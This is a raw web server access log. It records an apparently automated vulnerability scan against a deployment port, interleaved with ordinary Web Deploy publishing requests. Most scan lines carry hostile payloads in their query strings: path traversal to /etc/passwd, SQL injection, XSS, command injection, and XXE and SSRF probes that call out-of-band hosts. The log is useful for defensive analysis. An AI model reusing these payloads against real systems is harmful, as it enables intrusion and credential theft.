2024-01-05 04:06:18 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 11
2024-01-05 04:07:26 103.153.214.94 POST /session_login.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 19
2024-01-05 04:07:29 103.153.214.94 POST /rpc.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 13
2024-01-05 04:07:32 103.153.214.94 POST /session_login.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 8
2024-01-05 04:07:35 103.153.214.94 POST /rpc.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 5
2024-01-05 04:08:34 103.153.214.94 POST /ui/api/v1/ui/auth/login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 21
2024-01-05 04:08:51 103.153.214.94 GET /admin/ n=language&amp;c=language_general&amp;a=doSearchParameter&amp;editor=cn&amp;word=search&amp;appno=0+union+select+98989*443131,1--+&amp;site=admin 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
2024-01-05 04:09:42 103.153.214.94 POST /getcfg.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 11
2024-01-05 04:09:50 103.153.214.94 GET /jnoj/web/polygon/problem/viewfile id=1&amp;name=../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 10
2024-01-05 04:12:16 103.153.214.94 GET /api-third-party/download/extdisks../etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 0 23
2024-01-05 04:14:21 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 34
2024-01-05 04:14:52 103.153.214.94 GET /getFavicon host=http://oast.fun/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30
2024-01-05 04:15:11 103.153.214.94 GET /osm/REGISTER.cmd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
2024-01-05 04:15:15 103.153.214.94 GET /osm_tiles/REGISTER.cmd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 8
2024-01-05 04:15:21 103.153.214.94 GET /page/sl_logdl dcfct=DCMlog.download_log&amp;dbkey%3Asyslog.rlog=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 6
2024-01-05 04:15:29 103.153.214.94 POST /apply_sec.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 6
2024-01-05 04:15:32 103.153.214.94 POST /apply_sec.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 12
2024-01-05 04:15:35 103.153.214.94 POST /apply_sec.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 5
2024-01-05 04:16:11 103.153.214.94 GET / pum_action=tools_page_tab_system_info 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 04:16:14 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 5
2024-01-05 04:16:20 103.153.214.94 POST /admin/auth/reset-password - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 16
2024-01-05 04:16:53 103.153.214.94 GET /MicroStrategyLibrary/auth/ui/loginPage loginMode=alert(document.domain) 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 45
2024-01-05 04:17:03 103.153.214.94 POST /_syslog.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8
2024-01-05 04:17:47 103.153.214.94 POST /servlet/UploadServlet - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 04:17:47 103.153.214.94 GET /wp-content/plugins/hmapsprem/views/dashboard/index.php p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
2024-01-05 04:17:50 103.153.214.94 GET /test.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 5
2024-01-05 04:18:43 103.153.214.94 GET /Login !&#039;&gt;&lt;sVg/OnLoAD=alert`1337`// 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 8
2024-01-05 04:21:02 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 8
2024-01-05 04:23:46 103.153.214.94 GET /vpns/cfg/smb.conf - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 9
2024-01-05 04:24:20 103.153.214.94 POST /boafrm/formSysCmd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 8
2024-01-05 04:24:40 103.153.214.94 GET /plus/pass_reset.php L=english&amp;pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 8
2024-01-05 04:24:42 103.153.214.94 GET /wp-admin/admin.php page=download_report&amp;report=users&amp;status=all 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 6
2024-01-05 04:26:04 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 17
2024-01-05 04:26:04 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 33
2024-01-05 04:26:04 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 18
2024-01-05 04:26:04 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=11c0c401-6129-4fa6-8bb0-132ed49e4824;op=Sync - 200 0 0 405
2024-01-05 04:26:04 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 468
2024-01-05 04:26:04 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10
2024-01-05 04:26:48 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 43868
2024-01-05 04:26:48 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=11c0c401-6129-4fa6-8bb0-132ed49e4824;op=Sync - 200 0 0 43838
2024-01-05 04:27:11 103.153.214.94 GET / search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;location_search&amp;nearby=off&amp;address_lat&amp;address_lng&amp;distance=10&amp;lcats%5B%5D 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 14
2024-01-05 04:31:23 103.153.214.94 POST /dashboard/uploadID.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 9
2024-01-05 04:31:39 103.153.214.94 GET /xmlpserver/servlet/adfresource format=aaaaaaaaaaaaaaa&amp;documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 04:31:44 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 19
2024-01-05 04:32:09 103.153.214.94 GET /data/autosuggest-remote.php q=&quot;&gt;&lt;img%20src=x%20onerror=alert(1)&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 10
2024-01-05 04:32:12 103.153.214.94 GET /admin/data/autosuggest-remote.php q=&quot;&gt;&lt;img%20src=x%20onerror=alert(1)&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 04:33:35 103.153.214.94 GET /xmlpserver/convert xml=&lt;%3fxml+version%3d&quot;1.0&quot;+%3f&gt;&lt;!DOCTYPE+r+[&lt;!ELEMENT+r+ANY+&gt;&lt;!ENTITY+%25+sp+SYSTEM+&quot;http%3a//cmbglsthtacjkv124nvgnotqdj964u1mk.oast.pro/xxe.xml&quot;&gt;%25sp%3b%25param1%3b]&gt;&amp;_xf=Excel&amp;_xl=123&amp;template=123 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 21
2024-01-05 04:35:32 103.153.214.94 POST /rest/tinymce/1/macro/preview - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 bcvt.kontum.gov.vn:8172 404 7 0 25
2024-01-05 04:35:58 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7
2024-01-05 04:36:46 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7
2024-01-05 04:36:46 103.153.214.94 POST /pandora_console/index.php login=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 5
2024-01-05 04:36:49 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 5
2024-01-05 04:36:50 103.153.214.94 POST /pandora_console/index.php sec=netf&amp;sec2=operation/netflow/nf_live_view&amp;pure=0 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 6
2024-01-05 04:37:26 103.153.214.94 GET /secure/ManageFilters.jspa filter=popular&amp;filterView=popular 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 40
2024-01-05 04:37:56 103.153.214.94 GET /secure/ConfigurePortalPages!default.jspa view=search&amp;searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&amp;Search=Search 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 19
2024-01-05 04:38:13 103.153.214.94 GET /rest/api/2/user/picker query 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 8
2024-01-05 04:39:00 103.153.214.94 GET /test/pathtraversal/master/..%2f..%2f..%2f..%2f../etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 0 0 21
2024-01-05 04:39:27 103.153.214.94 GET /__r2/query-printRows.view schemaName=ListManager&amp;query.queryName=ListManager&amp;query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&amp;query.containerFilterName=CurrentAndSubfolders&amp;query.selectionKey=%24ListManager%24ListManager%24%24query&amp;query.showRows=ALL 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 8
2024-01-05 04:39:35 103.153.214.94 GET /labkey/__r1/login-login.view returnUrl=http://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 6
2024-01-05 04:39:47 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 10
2024-01-05 04:39:49 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 35
2024-01-05 04:39:49 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 33
2024-01-05 04:39:49 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 VS17.0:PublishDialog:WTE17.5.318.41597;sid=a1200ad7-737b-48d7-839a-987c6deabad7;op=Sync - 200 0 0 396
2024-01-05 04:39:49 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 540
2024-01-05 04:39:50 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 6
2024-01-05 04:39:52 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 5
2024-01-05 04:40:47 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 04:41:20 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 79
2024-01-05 04:41:20 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 60
2024-01-05 04:41:21 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 VS17.0:PublishDialog:WTE17.5.318.41597;sid=9b991bca-30d7-43a5-b79f-21c44a15ea0b;op=Sync - 200 0 0 1414
2024-01-05 04:41:21 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 1740
2024-01-05 04:41:21 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 34
2024-01-05 04:41:26 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 VS17.0:PublishDialog:WTE17.5.318.41597;sid=9b991bca-30d7-43a5-b79f-21c44a15ea0b;op=Sync - 200 0 0 4267
2024-01-05 04:41:26 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 4459
2024-01-05 04:42:30 103.153.214.94 GET /sell-media-search/ keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 12
2024-01-05 04:47:03 103.153.214.94 POST /node/1 _format=hal_json 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 16
2024-01-05 04:47:07 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 8
2024-01-05 04:47:15 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 12
2024-01-05 04:47:18 103.153.214.94 POST /_async/AsyncResponseService - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 11
2024-01-05 04:47:21 103.153.214.94 GET /_async/favicon.ico - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 5
2024-01-05 04:47:39 103.153.214.94 POST /adxmlrpc.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 65
2024-01-05 04:47:42 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 24
2024-01-05 04:48:55 103.153.214.94 GET /webapp/ fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 11
2024-01-05 04:51:19 103.153.214.94 POST /service/extdirect - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 39
2024-01-05 04:52:01 103.153.214.94 POST /photo/p/api/album.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 12
2024-01-05 04:52:49 103.153.214.94 GET /badging/badge_template_v0.php layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 10
2024-01-05 04:53:24 103.153.214.94 GET /updating.jsp url=https://interact.sh/ 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 8
2024-01-05 04:55:06 103.153.214.94 POST /cgi-bin/supportInstaller - 8172 - 203.205.9.60 MSIE - 404 7 0 8
2024-01-05 04:55:15 103.153.214.94 POST /api/timelion/run - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 8
2024-01-05 04:57:40 103.153.214.94 POST /rest/issueNav/1/issueTable - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 13
2024-01-05 05:00:00 103.153.214.94 GET / c=../../../../../../etc/passwd%00 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 15
2024-01-05 05:00:04 103.153.214.94 GET /badging/badge_print_v0.php tpl=../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 6
2024-01-05 05:00:04 103.153.214.94 GET /card_scan.php No=30&amp;ReaderNo=%60cat%20/etc/passwd%20%3E%20cEolwUYFSf.txt%60 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 21
2024-01-05 05:00:07 103.153.214.94 GET /cEolwUYFSf.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 6
2024-01-05 05:00:17 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gYXhwYmoudHh0YA===&amp;format=png 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 7
2024-01-05 05:00:20 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gYXhwYmoudHh0YA===&amp;format=jpg 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 5
2024-01-05 05:00:23 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gYXhwYmoudHh0YA===&amp;format=jpg 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
2024-01-05 05:00:26 103.153.214.94 GET /objects/axpbj.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 6
2024-01-05 05:00:29 103.153.214.94 GET /rest/api/latest/groupuserpicker query=1&amp;maxResults=50000&amp;showAvatar=true 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 10
2024-01-05 05:00:39 103.153.214.94 POST /plugins/servlet/gadgets/makeRequest - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 6
2024-01-05 05:01:01 103.153.214.94 GET /index.php/login - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 19
2024-01-05 05:01:29 103.153.214.94 POST /kindeditor/php/demo.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 12
2024-01-05 05:01:32 103.153.214.94 POST /php/demo.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 5
